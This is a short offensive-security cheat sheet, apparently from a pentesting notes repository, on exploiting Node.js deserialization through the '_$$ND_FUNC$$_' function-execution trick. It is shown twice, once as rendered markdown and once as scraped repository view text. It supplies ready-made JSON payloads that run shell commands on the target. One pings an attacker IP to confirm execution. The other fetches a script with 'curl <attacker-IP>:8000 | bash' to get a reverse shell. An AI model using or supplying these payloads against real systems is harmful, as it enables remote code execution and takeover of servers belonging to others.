killchain-compendium/Exploits/Web/Node.js Deserialization.md

# De/Serialization

* `_$$ND_FUNC$$_function (){}` is executed after parsing

## Example Payloads

* Encode, send and wait with `sudo tcpdump -i <interface> icmp`
```js
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
```
* reverse shell via 
```js
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 | bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# De/Serialization`

			* `_$$ND_FUNC$$_function (){}` is executed after parsing

			`## Example Payloads`

			* Encode, send and wait with `sudo tcpdump -i <interface> icmp`
			```js
			`{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}`
			```
			`* reverse shell via`
			```js
			`{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 \| bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}`
			```